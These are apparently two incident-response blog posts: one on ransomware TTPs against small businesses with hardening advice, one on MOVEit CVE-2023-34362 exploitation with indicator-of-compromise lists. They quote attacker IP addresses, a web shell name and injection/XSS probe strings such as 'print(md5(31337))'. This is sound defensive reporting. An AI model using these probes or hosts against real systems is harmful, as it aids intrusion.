RaaS | Dark Lab

Ransomware’s Uneven Playing Field: Re-Thinking Protection and Detection from Small and Medium Enterprises

Posted on January 21, 2025 by darklabhk

Recently, Dark Lab attended a conference to present the lessons learnt from ransomware incidents impacting small and medium enterprises (“SMEs”), and how these lessons learnt can help us find effective measures against ransomware threats.

Apart from our experience dealing with ransomware, it has been reported by the industry, that 85% of ransomware attack victims are small businesses.[1] These businesses present as lucrative targets for opportunistic ransomware actors, given their limited access to resources to implement robust security solutions.

In the past year, we have responded to numerous ransomware incidents involving small to medium enterprises (“SMEs”) that lack of the resources to invest in advanced security tools such as Endpoint Detection and Response (“EDR”) or Security Information and Event Management (“SIEM”) systems. Despite the absence of these tools, our incident response efforts have revealed simple controls that can effectively serve as containment, preventive, or damage-control measures.

Our presentation covered several ransomware incidents involving both well-known operators and newcomers to the field. We provided our insights into the threat intelligence associated with these actors, analyse the Tactics, Techniques, and Procedures (“TTPs”) used compared to large-scale ransomware, and share lessons learned from handling these incidents, including mistakes made by the threat actors. We further note the potential applications of these strategies in larger enterprises as a means to strengthen their own posture.

This blog will deep dive into the threat intelligence associated with the current ransomware landscape, the Tactics, Techniques and Procedures (“TTPs”) behind ransomware attacks, and our lessons learnt along with the insights from previous incident experience.

The Current Ransomware Landscape

Figure 1: Overview of changes in the ransomware landscape

In 2024, we observe an increasingly unpredictable and diverse ransomware landscape following multiple disruptive events that have reshaped how the ransomware ecosystem operates today.

Figure 2: Timeline of 2024’s “major disruptors” in the ransomware and wider cybercriminal landscape

Significant catalysts for these shifts include the persistence of law enforcement disruptions against larger Ransomware-as-a-Service (RaaS) operators, as exemplified in the ongoing #OpCronos against LockBit. Not to mention BlackCat’s alleged exit scam following allegations of failure to payout their affiliate for their attack on UnitedHealth.

These two instances alone incited heightened scepticism and distrust within the cybercriminal community, leading to a shift away from these “market leaders”. Quickly, we observed smaller and new players seize this opportunity to establish their presence within the ransomware ecosystem. Not only applying the lessons learnt from the downfalls of bigger players, and factoring in the changes to the ways in which victims respond to ransomware attacks, we observe these new joiners seeking to distinguish themselves and increase their chances of success through alternative means of approaching ransomware attacks. For example;

Figure 3: Latest trends observed amongst newer ransomware groups

A Focus on SMEs

Contrary to the misconception that SMEs are not a priority for ransomware groups due to the lower payout opportunity, we observe the majority of ransomware attacks are targeted against SMEs. This is as larger enterprises are now well-equipped with security solutions designed to prevent and detect against impending threats, thus posing SMEs as enticing targets for a higher likelihood of success.

We attribute this to a number of factors; limited funds to invest in cybersecurity professionals and technologies, lack of preparedness to respond to an attack, and the impact that operational disruptions may have on the viability of the business. Statistically, 75% of SMEs could not continue operating beyond seven (7) days if hit by ransomware [2], whilst 20% of SMEs that fell victim to a ransomware attack paid the ransom.[3] Furthermore, learning from the cases of LockBit and BlackCats’ notoriety, newer players seek to evade attention from media and law enforcement; conducting lower-profile attacks to maintain their presence and longevity.

Who’s targeting SMEs?

Figure 4: Snapshot of ransomware operators known to target SMEs

As seen in the image above, we observe both established RaaS operators who we track and know well, and newer players, experimental in the approaches to ransomware attacks, targeting SMEs. We note that this list is not exhaustive given the opportunistic nature of ransomware actors, and is further applicable in the context of larger enterprises.

With newer groups diversifying their attack methods and creating an increasingly ‘unpredictable’ ransomware threat, how can we stay focused?

Focusing on the “critical path”

Despite the abundance of new players on the market – bringing new approaches and techniques used to facilitate their attacks – we still observe overarching commonalities in their Tactics, Techniques, and Procedures (“TTPs”).

Figure 5: MITRE ATT&CK Heatmap – highlighting the most frequently leveraged TTPs*

The above MITRE ATT&CK heatmap compiles the TTPs used by various aforementioned threat actors. By focusing on the most frequently used TTPs (highlighted in red and orange), we can prioritise our efforts to strengthen defences against these techniques, creating a ‘critical path’ for us to focus our efforts in devising protection and detection.

This critical path provides a holistic view of RaaS operators, not just applicable to SMEs but all types of victims. In the case of SMEs, given the limited access to resources, this critical path provides a realistic baseline to focus resources on preventing and detecting against ransomware threats.

Our experience responding to ransomware attacks against SMEs

To consider how this “critical path” translates into real life, we referenced some historic cases we have battled, and the lessons learnt. Specifically, we deep dived into three (3) case studies, attributed to RansomHouse, SEXi (a.k.a. APT Inc.), and LockBit, respectively.

Each case study shared commonality in that initial access was obtained via breaching perimeter devices e.g., SSLVPN. However, the case studies provided a useful comparison on the degree of impact incurred within an SME environment depending on the presence (or lack thereof) sufficient security controls.

Figure 6: Case Studies – highlighted in pink are the techniques performed in these incidents

Case Study 1: RansomHouse affiliate (an “Old Guard”)

Figure 7: High-level timeline of incident attributed to RansomHouse affiliate

In the first case study, the RansomHouse affiliate achieved initial access via a known vulnerability. The affiliate proceeded to perform account brute forcing and network scanning using the commonly leveraged, SoftPerfect Scanner. Obtaining a service account granted with administrative privileges, the affiliate proceeded to perform Remote Desktop Protocol (RDP) for lateral movement. Notably, the service account was secured with a weak password and the last date of password reset was the same as its creation date – a common issue we have observed across SMEs, whereby they use a weak password for account creation, and subsequently neglect to change the password later.

The affiliate further enumerated the victim’s environment, obtaining additional credentials to access their ESXi, Network Attached Storage (NAS), various databases and Software-as-a-Service (SaaS) platforms. With their better understanding of the victim’s environment and the “crown jewels” to target for sensitive data, the affiliate proceeded to deploy the AnyDesk remote access software and a PowerShell script. This resulted in large outbound data exfiltration over 700 gigabytes (GB) of data before removing backups and deploying ransomware across their Network Attached Storage (NAS), backup servers, and virtual infrastructure (VMware ESXi) servers.

This case study highlights the sheer impact of a ransomware attack in environments lacking network segmentation, password policy enforcement, and sufficient access controls.

Case Study 2: SEXi affiliate (“New Blood”)

Figure 8: High-level timeline of incident attributed to SEXi (a.k.a. APT Inc.) affiliate

In our incident attributed to an affiliate of SEXi (now rebranded as APT Inc.) ransomware, the affiliate infiltrated via a SSLVPN entry, landing on a demilitarised zone (DMZ) server subnet. The affiliate was also observed to deploy the SoftPerfect Scanner for network discovery, resulting in the identification of a vulnerable Veeam Backup & Replication server. Exploiting the vulnerability to create a new local admin account, the threat actor proceeded to perform credential dumping on the Veeam server, obtaining valid ESXi and NAS credentials.

Pivoting to the ESXi and NAS servers, the SEXi affiliate proceeded to deploy their ransomware and delete all backup data on the NAS. Due to network segmentation in place, ransomware deployment was contained within the DMZ, and no data exfiltration was observed.

Case Study 3: LockBit affiliate (another “Old Guard”)

Figure 9: High-level timeline of incident attributed to LockBit affiliate

In our latest battle with LockBit, the affiliate infiltrated via a SSLVPN server using a valid SSLVPN account. In this case, the SSLVPN account belonged to a third-party vendor and had a weak password which had not been changed for over three (3) years. The affiliate landed on a DMZ zone, though due to poor network segmentation in place, the SSLVPN account was capable of accessing a management subnet with /16 IP addresses – a significantly large IP address range for the threat actor to access, not to mention a vendor.

Due to password reuse, the LockBit affiliate proceeded to takeover an administrator account, leveraged to laterally move to additional environments via RDP protocol. Notably, the admin account was utilised to perform a DCSync attack on the Domain Controller (DC). The affiliate then proceeded to perform data staging, focused on discovering Excel, PDF, and Word documents contained within shared folders. At this point, the affiliate installed MegaSync, a legitimate tool for data transfers, and created a folder for file staging. The affiliate then deployed ransomware. However, due to outbound network restrictions in place – no data exfiltration was involved.

Notably, the victim was not observed to be listed on LockBit’s dedicated leak site, which we hypothesised was due to their inability to exfiltrate data from the victim’s environment. This highlights the effectiveness in file transfer restrictions in not only mitigating against the compromise of data, but the ability to avoid reputational damage from public awareness of the ransomware incident.

Case Study Comparison; Same Same (TTPs), But Different (Impact)

Comparison of these similar attacks highlight how enforcing simple controls to restrict malicious activity can significantly minimise the impact of ransomware attacks.

Figure 10: Case Studies – summary of key observations

Through our incident experience, we highlight the following common issues in SMEs:

Initial access is achieved through preventable “low hanging fruit”, such as;
- Commodity VPNs (e.g., Fortinet SSLVPN, SonicWall SSLVPN, etc.)
- Infostealer data and credentials leaked on dark web
Lack of awareness and/or implementation of:
- Strong password policies – guidelines that enforce the creation and use of complex, hard-to-crack passwords
- Patch management – regular updating of software to remediate susceptibility to vulnerabilities that otherwise may be exploited by malicious actors
- Perimeter services – security measures that protect the outer boundaries of a network, such as firewalls and intrusion detection systems (IDS)
- Network segmentation – practice of dividing a network into smaller, isolated segments to limit access and lateral movement opportunities

What can SMEs do to minimise the risk and impact of ransomware threats?

From basic hardening configurations within Active Directory to enabling detection with honeytokens and strategically planning network restrictions, we share practical tips and strategies that we have implemented in our clients’ environments. This demonstrates how small businesses can reduce their risk from a full-scale ransomware attack or minimize the impact of such events. Additionally, we note that these strategies can be further leveraged by larger entities to strengthen their own environments.

Initial Access

Threat actors often seek “low hanging fruit” to gain initial access. For example, exposed SSLVPN gateways are frequently brute forced by malicious actors using leaked credentials.

The following tips can aid SMEs in minimising their attack surface exposure to reduce the risk of unauthorised access.

On the perimeter-level, SMEs can consider the follow tips to minimise their attack surface exposure;

Stock take exposed services, patch or restrict administrative portals
Trim down access from SSL VPN to internal network
Isolate the systems with legacy operating systems

Access controls can further limit the opportunity for threat actors to infiltrate and/or persist in their post-compromise stages;

Housekeep accounts, and strengthen existing multi-factor authentication
Trim down access from SSL VPN to internal network
Use a separate set of credentials for SSL VPN access

Discovery

Threat actors typically use tools like Network Scanners (e.g., SoftPerfect) that rely on file shares to enumerate files for targeting.

A file share is a network resource that allows multiple users or devices to access and share the files and folders over a network. Threat actors frequently leverage these file shares to identify files of interest (e.g., containing ‘password’, ‘confidential’, ‘finance’, ‘secret’, ‘backup’, ‘admin’, etc.).

To restrict the opportunity for threat actors to perform discovery via file shares, we recommend:

Perform a stock-take on file servers to identify critical files housing sensitive and/or confidential data
Review what users are allowed to access critical files, and restrict access based on the principle of least privilege

Canary tokens[4], otherwise known as a honey tokens, provide another avenue for proactive threat detection. Canary tokens are a digital identifier embedded within files, URLs, or systems to detect unauthorised access or activity. When an attacker interacts with a canary token, it triggers an alert to notify administrators of a potential breach.

Figure 12: Canary Token for Network Folders[5]

Figure 13: Canary Token for Windows Folders[6]

Lateral Movement

Threat actors target privileged accounts as part of their intrusion, in particular Domain Admins, leveraging their heightened privileges to perform various activities, spanning from data collection and exfiltration to ransomware deployment.

This begs the question; Do we really need to use “Domain Admins” for day-to-day operations?

Tips to secure domain admin accounts and reduce opportunities for lateral movement:

Account tiering is an effective means to reduce the risk of credential theft for administrative accounts. In short, it is the process of categorizing accounts and systems into tiers based on criticality. According to Microsoft, the “tier model creates divisions between administrators based on what resources they manage….[so that] admins with control over user workstations are separated from those that control applications”.[7]

Enforce logon restrictions to ensure highly privileged accounts do not possess access to less secure resources. For example, domain admins (tier 0) should not possess permissions to access user workstations (tier 2).[8]

Restrict login attempts from Remote Desktop Services[9]

Ensure critical systems are kept up-to-date with regular patching. This involves referencing the systems categorized as critical (or “tier 0), and prioritizing these systems in your patch management process. As an example, Veeam Backup & Replication[10] and ESXi instances [11] are regularly targeted by multiple groups for ransomware deployment.

Exfiltration (and Remote Access)

Threat actors frequently abuse legitimate solutions to facilitate their remote access (e.g., AnyDesk, TeamViewer, etc.) and data exfiltration (e.g., MegaSync, Rclone, etc.). Furthermore, in some cases we observed that host-based firewall may have been controlled by a compromised administrative account.

To detect for the malicious misuse of these legitimate tooling and/or accounts, we advise the use of an Active Directory-Integrated DNS (ADIDNS) sinkhole – ensuring proper Access Control Lists (ACLs) are configured.

A DNS sinkhole, otherwise known as a sinkhole server, is a DNS server that provides false information to prevent the use of domain names. It is a strategy used to block malicious traffic. When a device attempts to access a known malicious domain, the DNS sinkhole redirects the request to a non-routable address, effectively “sinking” the traffic and preventing the device from connecting to a harmful site.[12]

Conclusion

As the ransomware landscape continues to evolve and diversify in the threats faced, focusing on identification of predictable TTPs, or even a ‘critical path’, helps us prioritize efforts to defend against the most pertinent threats.

Whilst SMEs may struggle due to their technical limitations and resources, we hope this blog helps provide insight in the simple, yet effective means in which SMEs can uplift their security posture. As a reminder, implementation of these strategies requires carefully designed architecture and process planning (e.g., appropriate access controls, standard operating processes) to maintain effectiveness. Furthermore, we note that these approaches are universal and applicable in larger enterprises, providing proactive opportunities to harden your security posture.

What lies ahead for the future of ransomware?

As organisations increasingly shift to cloud and integration of Software-as-a-Solution (SaaS), we expect to see increased targeting against these environments. Whilst we already observe ransomware actors selling compromised databases, we project an uptick in the reselling of access for re-intrusion into victim environments by other threat actors. The application of artificial intelligence (AI) and automation intelligence within the cybercriminal is a continued discussion, as we anticipate threat actors expanding beyond the use of AI for content generation (in the context of social engineering) to other applications. There’s no telling for certain what else the future holds, but for now, let’s concentrate on safeguarding ourselves against the most crucial threats.

MITRE ATT&CK TTPs for the “Critical Path”

We include the observed MITRE ATT&CK tactics and techniques highlighted in the “critical path”:

MITRE ID	MITRE ATT&CK Tactic	MITRE ATT&CK Technique
T1583	Resource Development	Acquire Infrastructure
T1587	Resource Development	Develop Capabilities
T1588	Resource Development	Obtain Capabilities
T1566	Initial Access	Phishing
T1190	Initial Access	Exploit Public-Facing Application
T1078	Initial Access	Valid Accounts
T1133	Initial Access	External Remote Services
T1059	Execution	Command and Scripting Interpreter
T1053	Execution	Scheduled Task/Job
T1047	Execution	Windows Management Instrumentation
T1106	Execution	Native API
T1204	Execution	User Execution
T1569	Execution	System Services
T1136	Persistence	Create Account
T1543	Persistence	Create or Modify System Process
T1098	Persistence	Account Manipulation
T1505	Persistence	Server Software Component
T1547	Persistence	Boot or Logon Autostart Execution
T1055	Privilege Escalation	Process Injection
T1134	Privilege Escalation	Access Token Manipulation
T1027	Defense Evasion	Obfuscated Files or Information
T1562	Defense Evasion	Impair Defenses
T1112	Defense Evasion	Modify Registry
T1140	Defense Evasion	Deobfuscate/Decode Files or Information
T1036	Defense Evasion	Masquerading
T1218	Defense Evasion	System Binary Proxy Execution
T1497	Defense Evasion	Virtualization/Sandbox Evasion
T1070	Defense Evasion	Indicator Removal on Host
T1222	Defense Evasion	File and Directory Permissions Modification
T1564	Defense Evasion	Hide Artifacts
T1003	Credential Access	OS Credential Dumping
T1083	Discovery	File and Directory Discovery
T1082	Discovery	System Information Discovery
T1018	Discovery	Remote System Discovery
T1057	Discovery	Process Discovery
T1135	Discovery	Network Share Discovery
T1016	Discovery	System Network Configuration Discovery
T1046	Discovery	Network Service Discovery
T1069	Discovery	Permission Groups Discovery
T1087	Discovery	Account Discovery
T1482	Discovery	Domain Trust Discovery
T1518	Discovery	Software Discovery
T1021	Lateral Movement	Remote Services
T1210	Lateral Movement	Exploitation of Remote Services
T1570	Lateral Movement	Lateral Tool Transfer
T1005	Collection	Data from Local System
T1560	Collection	Archive Collected Data
T1039	Collection	Data from Network Shared Drive
T1105	Command and Control	Ingress Tool Transfer
T1219	Command and Control	Remote Access Software
T1071	Command and Control	Application Layer Protocol
T1041	Exfiltration	Exfiltration Over C2 Channel
T1048	Exfiltration	Exfiltration Over Alternative Protocol
T1567	Exfiltration	Exfiltration Over Web Service
T1486	Impact	Data Encrypted for Impact
T1490	Impact	Inhibit System Recovery
T1485	Impact	Data Destruction

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

MOVEit Cl0p, You’re Not the Only One

Posted on September 7, 2023 by darklabhk

In Q3 2023, PwC’s Dark Lab responded to two incidents derived from exploitation of the zero-day vulnerability in Progress’ MOVEit File Transfer solution. Whilst exploitation of the zero-day is widely associated with Cl0p, deeper inspection of our second incident indicated another player was at hand.

PwC’s Dark Lab have been closely monitoring the mass exploitation of the MOVEit file transfer solution, responding to numerous incidents initiated via exploitation of the zero-day MOVEit Transfer and Cloud vulnerability, CVE-2023-34362. The mass exploitation has been widely associated with the Cl0p Ransomware-as-a-Service (RaaS) group, due to their discovery of the zero-day and large-scale, opportunistic campaign impacting over 260 as of 1 August 2023. However, per our incident experience, we observe other malicious actors opportunistically leverage publicly available Proof-of-Concepts (PoCs) to infiltrate vulnerable MOVEit victims.

We release this blog post concurrent to Cl0p’s ongoing campaign to highlight PwC Dark Lab’s key observations through our incident experience across two MOVEit-related incidents, the first attributed to a Cl0p RaaS, and the second highlighting the opportunistic exploitation by other, less sophisticated cybercriminal actors.

Case Study 1: Cl0p’s Mass Exploitation of the MOVEit Zero-Day

In the incident responded to by PwC’s Dark Lab, a Cl0p affiliate conducted a single extortion attack, exploiting CVE-2023-34362 and subsequently exfiltrate data directly from the MOVEit file transfer server over a 24-hour period of the initial infiltration. Based on our continuous monitoring of Cl0p’s campaign and their evolving techniques, we posit that the group’s next mass-exploitation campaign will remain significant in scale and speed, though will further enhance in sophistication as the group leverages the learnings from their ongoing campaign to improve operational efficiency by exploring means to better categorise compromised data.

The MOVEit File Transfer zero-day SQL injection vulnerability (CVE-2023-34362) has been actively exploited by the Cl0p Ransomware-as-a-Service (RaaS) group since at least 27 May 2023 to deploy the human2.aspx web shell and subsequently exfiltrate data from the compromised MOVEit server.[1]

Based on our incident experience in alignment with open source intelligence, we observed in alignment with open source intelligence (OSINT) that Cl0p’s MOVEit campaign to follow the following kill chain:

**Figure 1: Cl0p’s Known Attack Path for the MOVEit Campaign**

Initial Access

The malicious actor exploited CVE-2023-34362 to bypass authentication and successfully infiltrate the compromised MOVEit server. This is evident by the malicious actor’s activities to deploy and use a web shell to interact with the systems from the external network. Through analysis of the inbound IP addresses, we observed (5.252.189[.]0/24 and 5.252.190[.]0/24) to have a known association with the Cl0p RaaS.[2]

Privilege Escalation

Post-infiltration, the affiliate was observed to leverage the web shell to access the stored data in the application database of MOVEit application, and eventually obtained a privileged administrator account.

Persistence and Execution

Consistent with open source reporting of the Cl0p MOVEit campaign, the Cl0p affiliate deployed the human2.aspx web shell on the compromised MOVEit system.

Collection and Exfiltration

Less than twenty minutes after the web shell deployment, the privileged admin account was leveraged to download data from the MOVEit server. Concurrently, a spike in outbound network traffic was detected at the perimeter firewall. Through data exfiltration analysis of the firewall logs, our incident responders ascertained the file size and nature of files (e.g. file name and extension), validating the spike to be indicative of the time of Cl0p’s data exfiltration to an external IP address.

Impact

Approximately two weeks after the data exfiltration, the victim was listed on Cl0p’s dedicated leak site “Cl0p^_LEAKS”, with compromised data leaked twelve (12) days after the victim was published. This contradicts Cl0p’s announcement post, as per Step 6, the group state “After 7 days all your data will start to be publication”.

Cl0p’s Victimology and Data Leakage Trends

**Figure 3: Trendline of Cl0p’s Victim Listing on their Cl0p^_LEAKS Site**

As of 1 August 2023, we observed:

262 victims listed (15 removed, potentially indicative of the victim’s compliance with Cl0p’s demands)
Of the 262 victims, 94% had their data posted by Cl0p on their dedicated victim pages, with approximately 6% of those victims experiencing multiple leaks – up to six (6) parts
Cl0p repeatedly deviated from their self-assigned 7-day deadline – for example, on 11 July it was observed that three victims newly listed on 10 July had already experienced their data leaked. This is in contrast to the incident responded to by PwC’s Dark Lab whereby data leakage occurred twelve (12) days after the initial victim leaking, suggesting they likely encountered challenges with the large amount of data concurrently received in a short time frame, and hence may have experienced backlogs in sifting through and identifying meaningful compromises.
From 10 July, we observed Cl0p update their dedicated victim pages, adding a new section ‘Some secret information files’, inclusive of screenshots compromised files allegedly obtained via their exploitation of the MOVEit vulnerability. This indicates Cl0p’s adaptive nature, likely as an attempt to apply added pressure to victims to entice them to meet ransom demands.

**Figure 4: New ‘Some secret information files’ Section Added to Victim’s Dedicated Leak Pages**

Based on the victimology of Cl0p’s ongoing MOVEit campaign, we assess their targeting to be opportunistic in nature, as reflected in the distribution of victims across multiple sectors and geographies. However, we observe approximately 65% of total disclosed victims are based in the United States which is consistent with OSINT location distribution of MOVEit servers observed via passive scanning, the United States makes up approximately 72% of total Internet-facing MOVEit instances.

Whilst likely opportunistic, we also observe a potential alignment to trends that RaaS groups with Russian-links are electing to target Western-allied nations. Though RaaS groups and cybercriminals are opportunistic in nature, heightened targeting of Western-allied nations in 2023 suggest the impact of the war and allegiance potentially plays a role in their actions. As such, Cl0p may have intentionally shortlisted the MOVEit file transfer solution for their mass exploitation campaign based on the location distribution of MOVEit servers, observing the solution to be predominantly leveraged in Western-allied nations.

**Figure 5: Cl0p’s Victim Distribution – Top 5 Countries**

Further, it should be noted that this campaign is not the first instance of Cl0p targeting file transfer solutions. In February 2023, Cl0p was also responsible for the mass automated exploitation of a previous zero-day vulnerability within a third-party file transfer product, Fotra’s GoAnywhere Managed File Transfer (CVE-2023-0669).[3]Prior to this, the threat actor also claimed responsibility for another mass exploitation of another file transfer software in the form of multiple CVEs impacting Accellion File Transfer Application in 2020.[4] Given Cl0p’s historic targeting of file transfer software, and consistencies observed across campaigns, we posit that Cl0p will continue to opportunistically seek and exploit zero-day vulnerabilities in file transfer solutions, given their storage of sensitive information.

Furthermore, we observe via OSINT that multiple organisations were compromised by Cl0p despite not leveraging the MOVEit File Transfer solution in downstream attacks following the compromise of their third-party contractors’ MOVEit application.[5] This highlights the impact of third-party risks, as we observe via our incident experience and OSINT that threat actors are continuously seeking opportunities to expand their victim targeting to maximise efforts (e.g. infiltrating new victims via compromised valid vendor accounts).

Case Study 2: Not the Only Player Making Moves

As hypothesised in our Forecast of the Cyber Threat Landscape blog post[6], we observe via in this incident as well as our continuous monitoring of zero-days and actively exploited vulnerabilities, that threat actors are rapidly weaponising Proof-of-Concepts (PoC) and exploit codes upon their availability to compromise temporarily vulnerable systems.

Upon the release of a PoC for CVE-2023-34362, PwC’s Dark Lab hypothesised that the vulnerability would swiftly be exploited by other opportunistic threat actors, given the ease of exploitation and ability for an unauthorised remote attacker to gain unauthorised access to potentially sensitive information stored in the vulnerable MOVEit instances. This was observed in a second incident responded to by PwC’s Dark Lab, which displayed multiple inconsistencies with Cl0p’s typical attack path.

In this incident, the victim’s MOVEit servers were subject to vulnerability scanning by a suspected Cl0p affiliate, based on the use of IP addresses with known association with the Cl0p RaaS group. However, no further actions were observed to be conducted by the Cl0p affiliate following their exploitation attempts (e.g. no web shell deployment or data exfiltration).

Two weeks later, a separate malicious actor (46.3.199[.]72) was observed to perform brute-forcing and argument fuzzing to attempt exploitation against the victim’s MOVEit servers. Post-exploitation of CVE-2023-34362, the threat actor performed unauthorised account and folder creation, shortly followed by folder and account deletion, but was unable to deploy malware or proceed with their attack.

Based on our investigation of the available logs and comparison against Cl0p’s known known attack path per our first incident and also aligned with the OSINT described in the overview, we assessed with high confidence that the incident was performed by an unsophisticated financially-motivated cybercriminal actor executed the cyber-attack against the victim using a publicly available PoC.

To validate our hypothesis and remove potential biases, we leveraged the Richard Heuer’s Analysis of Competing Hypotheses (ACH) methodology.[7]

Evidence	Description Related to Incident	Credibility	Relevance	Evidence Type	H1 – Cl0p affiliate that is financially motivated	H2 – A sophisticated threat actor motivated by political or social cause	H3 – An unsophisticated financially-motivated cybercriminal actor
Use of MOVEit Transfer SQL Injection Vulnerability (CVE-2023-34362)	We observed via review of the IIS logs that this vulnerability was leveraged to achieve initial access.	High	High	Secondary	Consistent	Consistent	Consistent
MOVEit Transfer vulnerabilities are relatively easy to weaponize given publicly available Proof of Concepts (PoCs)	We observed via OSINT the availability of multiple PoCs, indicative that threat actors are weaponizing the exploit. Whilst we did not attempt to validate the effectiveness of the PoCs, the fact there are POCs available on the open source suggests that threat actors of lowered capability can weaponize it.	High	Medium	Dark Lab Assessment	Consistent	Consistent	Consistent
IP address 46.3.199[.]72 and its related IP addresses are related to Cl0p and affiliates	We observed that the IP addressed utilized to achieve successful initial access was not attributed to Cl0p affiliates, based on various OSINT reports.	Medium	High	Primary	Inconsistent	Inconsistent	Consistent
Capability to perform SQL injection	We observed via review of the IIS logs that the threat actor had sought to perform SQL injection.	Medium	Medium	Primary	Consistent	Consistent	Consistent
Use of automated tools within Burp Suite (e.g., Repeater) that indicates brute forcing, fuzzing and crawling	We observed from reviewing the IIS logs that the threat actor had likely leveraged Burp Suite to perform standard SQL injections. This is based on the review of production server’s IIS logs in which we observed the User-Agent content to be similar to Burp Suite’s Repeater feature.[8] Meanwhile, review of the testing database logs revealed that the threat actor performed around 800 actions within a short timeframe of 40 minutes, with some just 0 or 1 seconds apart, with parameters such as “onmouseover=“ and “print(md5(31337))” being observed. These are commonly observed attacks for SQL injection and/or cross site scripting[9] being performed using Burp Suite.[10] The performance of multiple actions in an accelerated manner with parameter contents that are generic in nature provided us with evidence that there was automated tools such as Burp Suite and potentially open source scripts[11] leveraged to perform these malicious activities.	Medium	Medium	Dark Lab Assessment	Not Applicable	Inconsistent	Consistent
No evidence of lateral movement that is consistent with Cl0p’s MOVEit campaign	We have not observed from the generic attack path by Cl0p RaaS affiliates that there would be lateral movement in victims’ environments.	High	High	Primary	Consistent	Inconsistent	Inconsistent
No evidence of data exfiltration	We have not observed any data exfiltration based on our DFIR investigations and continued review of the Cl0p leak site.	High	High	Dark Lab Assessment	Inconsistent	Inconsistent	Consistent
Victim was listed on Cl0p’s leak site as of the time of investigation	Through our continuous monitoring of the Cl0p leak site, we observed that victims continue to be listed up to two (2) months after the original SQL Injection vulnerability (CVE-2023-34362) was disclosed. Given the lengthy time from exploitation to date, combined with the lack of data exfiltration during our investigation, we conclude that this behaviour is largely inconsistent with a Cl0p affiliate.	High	High	Secondary	Inconsistent	Not Applicable	Not Applicable

Conclusion

Cl0p’s mass exploitation of the MOVEit zero-day represents the continuous evolution of the cyber threat landscape and the increasing sophistication of financially-motivated cybercriminals. Per our 2023 Forecast of the Cyber Threat Landscape blog post[12], cybercriminals are weaponising exploits at an increasingly fast rate and scale to bypass heightened controls. This is reflected in the sheer volume of zero-days exploited in 2023 thus far, with 54 zero-day vulnerabilities discovered between 1 January 2023 and 1 August 2023 alone, compared to 52 zero-days discovered during 2022.[13] However, whilst exploits are happening faster – as predicted – and threat actors persist with single extortion attacks for speed, we observe through Cl0p’s campaign that they are largely relying on manpower to sift through troves of data at the time of writing, which may cause operational backlog. We posit that Cl0p will improve this aspect in future exploitation, possibly through data classification or generative artificial intelligence (AI).

Further, we posit that Cl0p will continue to target Internet-facing web applications with mass file transfer capabilities, following two widely-reported incidents regarding GoAnywhere MFT and MOVEit File Transfer systems.As a result, it is critical that organisations proactively identify their Internet-facing web applications with such features and apply the necessary hardening measures to limit the impact of potential incidents.

As organisations increasingly harden their security posture, malicious actors are ramping their speed of exploitation to capitalise on their momentary vulnerability susceptibility until a patch is deployed. This places increasing pressure on organisations to enforce stringent preventive and detective controls to provide a layered defense to counter exploitation attempts by malicious actors and minimise the threat of supply chain risks.

Recommendations

Preventive

Organisations should identify Internet-facing web applications with such features and perform the necessary hardening (e.g., MFA, privilege rights management, file encryption, remediation against findings from OWASP Top 10 testing) to limit the impact of potential incidents.
Harden Internet-facing web applications with file transfer capabilities – including tightening access controls, file encryption, and remediations against findings from the OWASP Top 10 Web Application Security Risks.[14]
Enhance access controls to file transfer solutions such as MOVEit to restrict unauthorised users from obtaining access to critical information. This may include,
- Enabling multi-factor authentication (MFA) for file transfer solutions.
- Reducing the exposure of file transfer solutions (e.g. disable HTTP/S connections, or restricting access to only necessary endpoints).
- Reviewing and enhancing privileged access permissions to restrict and limit users accessing the systems (e.g. geofencing to restrict administrative access from only authorised geolocations).
- Tightening outbound traffic rules to restrict cross-country network traffic and unsolicited destinations, to further minimise the risk of unauthorised data exfiltration.
- Applying heightened access controls and segment critical infrastructure from the internal network.
Ensure your patch management program includes procedures to escalate patching of critical vulnerabilities or appropriate temporary measures to mitigate your susceptibility to exploitation until the official patch can be applied.
Regularly review perimeter network firewall rules and application controls to reduce service exposure to the Internet.
Periodically perform simulation testing (e.g. red team or purple team exercise) to identify potential enhancement areas to further harden your organisation’s cybersecurity posture and reduce your attack surface exposure.

Detective

Leverage an Endpoint Detection & Response (EDR) solution capable of detecting advanced techniques at a host-based status, as well as ingestion of other threat intelligence signatures.
Ensure detection signatures for firewall and anti-virus solution(s) are maintained up-to-date, with ingestion of other threat intelligence signatures.
Consider implementation of a File Integrity Monitoring (FIM) solution on backend servers (e.g. IIS) to monitor for anomalous file modification activity (e.g. file creation, modification, or deletion).
Conduct a search of historical logs to detect for any potential presence in your network environment, ensuring that an alert system is established should any indicators be identified. If any indicators are discovered, it is advised that a digital forensic investigation is conducted to identify the potentially foregone impact, including the compromised information and systems, and apply the appropriate containment and remediation measures.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques from the two incidents:

Case Study 1: Cl0p RaaS Affiliate

T1595 – Active Scanning
T1190 – Exploit Public-Facing Application
T1136 – Create Account
T1505.003 – Server Software Component: Web Shell
T1068 – Exploitation for Privilege Escalation
T1078 – Valid Accounts
T1567 – Exfiltration Over Web Service

Case Study 2: Unsophisticated, Financially-Motivated Cybercriminal

T1595 – Active Scanning
T1190 – Exploit Public-Facing Application
T1136 – Create Account
T1565 – Data Manipulation

Indicators of Compromise (IoCs)

Case Study 1: Cl0p RaaS Affiliate

IoC	Type
5.252.189.106	Cl0p IP address used for exploitation files
5.252.189.170	Cl0p IP address used for exploitation files
5.252.190.40	Cl0p IP address used for exploitation files
5.252.189.98	Cl0p IP address used for exploitation files
5.252.190.111	Cl0p IP address used for exploitation files
5.252.190.159	Cl0p IP address used for exploitation files
5.252.190.65	Cl0p IP address used for exploitation files
5.252.190.132	Cl0p IP address used for exploitation files
5.252.190.33	Cl0p IP address used for exploitation files
5.252.189.192	Cl0p IP address used for exploitation files
5.252.191.19	Cl0p IP address used for exploitation files
5.252.190.201	Cl0p IP address used for exploitation files
5.252.189.120	Cl0p IP address used for exploitation files
5.252.189.137	Cl0p IP address used for exploitation files
185.162.128.109	IP address used for download files
Human2.aspx	Web shell

Case Study 2: Unsophisticated, Financially-Motivated Cybercriminal

IoC	Type
5.252.189[.]75	Cl0p IOC IP address
5.252.190[.]54	Cl0p IOC IP address
5.252.190[.]71	Cl0p IOC IP address
5.252.191[.]52	Cl0p IOC IP address
5.252.191[.]68	Cl0p IOC IP address
46.3.199[.]72	Threat actor IP address
wrbeirqx	Account created on MOVEit testing and production database
xfs.bxss.me	Account created on MOVEit testing database
print(md5(31337))	Command potentially indicating attempted SQL injections or cross site scripting using Burp Suite

Further information

